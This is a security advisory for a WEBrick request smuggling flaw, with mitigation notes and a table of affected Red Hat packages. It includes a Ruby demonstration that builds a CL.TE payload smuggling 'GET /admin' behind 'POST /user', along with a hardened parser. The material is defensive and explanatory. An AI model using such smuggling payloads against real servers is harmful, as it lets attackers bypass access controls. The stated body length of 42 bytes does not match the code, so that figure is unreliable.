Description
An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby. It allows HTTP request smuggling by providing both a Content-Length header and a Transfer-Encoding header, e.g., "GET /admin HTTP/1.1\r\n" inside of a "POST /user HTTP/1.1\r\n" request. NOTE: the supplier's position is "Webrick should not be used in production."
A flaw was found in the webrick toolkit. The server incorrectly handles requests that carry both a Content-Length and a Transfer-Encoding header, so the two headers can frame the message body differently. An attacker can use this to smuggle an extra request, such as GET /admin, behind a normal request such as POST /user: the bytes that one component treats as the body of POST /user are parsed by the other as a second request. As a result, an unauthenticated user may reach restricted paths like /admin through an otherwise permitted POST /user.
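The desync behind this description, shown as an added example that is not WEBrick's code. It assumes a CL.TE split: a front-end that frames the message by Content-Length and a back-end that frames it by Transfer-Encoding: chunked. The payload, host name and path are constructed for the demonstration. The hardened variant applies the RFC 7230 §3.3.3 rule that a request carrying both headers is ambiguous and should be treated as an error rather than interpreted.

```ruby
# Constructed CL.TE request-smuggling demonstration (added example, not WEBrick code).
# A front-end frames the request by Content-Length, a back-end by Transfer-Encoding.
# Whatever the back-end has left over after the chunked body ends is parsed as a
# second, attacker-controlled request.

CRLF = "\r\n"

# Constructed attacker payload: the chunked body ends immediately ("0\r\n\r\n"),
# but Content-Length also covers the smuggled GET /admin that follows it.
SMUGGLED = "GET /admin HTTP/1.1" + CRLF + "Host: victim.example" + CRLF + CRLF
CHUNKED_BODY = "0" + CRLF + CRLF
PAYLOAD =
  "POST /user HTTP/1.1" + CRLF +
  "Host: victim.example" + CRLF +
  "Content-Length: #{(CHUNKED_BODY + SMUGGLED).bytesize}" + CRLF +
  "Transfer-Encoding: chunked" + CRLF +
  CRLF +
  CHUNKED_BODY + SMUGGLED

# Split raw bytes at the first blank line: [request_line, headers_hash, remaining_bytes].
def parse_head(raw)
  head, rest = raw.split(CRLF + CRLF, 2)
  lines = head.split(CRLF)
  request_line = lines.shift
  headers = lines.each_with_object({}) do |line, h|
    name, value = line.split(":", 2)
    h[name.strip.downcase] = (value || "").strip
  end
  [request_line, headers, rest || ""]
end

# Front-end framing (assumed proxy behaviour): trust Content-Length only.
def frame_by_content_length(raw)
  request_line, headers, rest = parse_head(raw)
  len = headers["content-length"].to_i
  { request: request_line, body: rest.byteslice(0, len), leftover: rest.byteslice(len..) || "" }
end

# Back-end framing (assumed vulnerable behaviour): trust Transfer-Encoding: chunked only.
def frame_by_chunked(raw)
  request_line, headers, rest = parse_head(raw)
  body = String.new
  loop do
    size_line, rest = rest.split(CRLF, 2)
    break if size_line.nil?
    size = size_line.to_i(16)
    break if size.zero?
    body << rest.byteslice(0, size)
    rest = rest.byteslice(size + CRLF.bytesize..) || ""
  end
  # Skip the (possibly empty) trailer section that ends with a blank line.
  loop do
    line, rest = rest.split(CRLF, 2)
    rest ||= ""
    break if line.nil? || line.empty?
  end
  { request: request_line, body: body, leftover: rest }
end

# Hardened framing per RFC 7230 section 3.3.3: both headers present is an error.
def frame_strict(raw)
  _, headers, = parse_head(raw)
  if headers.key?("transfer-encoding") && headers.key?("content-length")
    raise ArgumentError, "ambiguous framing: both Transfer-Encoding and Content-Length present"
  end
  headers.key?("transfer-encoding") ? frame_by_chunked(raw) : frame_by_content_length(raw)
end

# Run both framings over the same bytes and report what each side sees.
def demo
  front = frame_by_content_length(PAYLOAD)
  back  = frame_by_chunked(PAYLOAD)
  {
    front_leftover: front[:leftover],                       # proxy sees one complete request
    smuggled_request: back[:leftover].split(CRLF).first,    # back-end sees a second request
  }
end

if __FILE__ == $PROGRAM_NAME
  r = demo
  puts "front-end leftover bytes: #{r[:front_leftover].bytesize}"
  puts "back-end parses next:     #{r[:smuggled_request]}"
  begin
    frame_strict(PAYLOAD)
  rescue ArgumentError => e
    puts "strict parser: #{e.message}"
  end
end
```

The front-end forwards all 42 body bytes as one request, while the back-end stops at the zero-length chunk and queues `GET /admin HTTP/1.1` as the next request on the connection. The strict parser rejects the message outright, which is the behaviour to expect from whichever component sits in front of WEBrick.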
Statement
This CVE is rated as having Moderate impact because WEBrick should not be used in production. It is still maintained only because other gems depend on it, most of them only for testing, and only because it is a pure Ruby implementation that was shipped with Ruby in the past.
Mitigation
As a temporary workaround, avoid using WEBrick in production environments. If you must use it, place the application behind a reverse proxy that validates and normalizes incoming requests; for this issue that means the proxy must reject, or rewrite into a single unambiguous framing, any request that carries both a Content-Length and a Transfer-Encoding header. A proxy that forwards such requests unchanged does not mitigate the smuggling.
Affected packages
| Platform | Package | State | Advisory | Release date |
|---|---|---|---|---|
| Red Hat 3scale API Management Platform 2 | 3scale-amp-backend-container | Will not fix | | |
| Red Hat 3scale API Management Platform 2 | 3scale-amp-system-container | Will not fix | | |
| Red Hat 3scale API Management Platform 2 | 3scale-amp-zync-container | Will not fix | | |
| Red Hat Enterprise Linux 10 | pcs | Not affected | | |
| Red Hat Enterprise Linux 9 | pcs | Not affected | | |
| Red Hat Satellite 6 | rubygem-webrick | Affected | | |
| Red Hat Satellite 6 | satellite-capsule:el8/rubygem-webrick | Affected | | |
| Red Hat Satellite 6 | satellite:el8/rubygem-webrick | Affected | | |
| RHOL-5.9-RHEL-9 | openshift-logging/cluster-logging-operator-bundle | Fixed | RHSA-2025:1227 | 2025-02-12 |
| RHOL-5.9-RHEL-9 | openshift-logging/cluster-logging-rhel9-operator | Fixed | RHSA-2025:1227 | 2025-02-12 |
Additional information
CVSS3: 7.5 (High)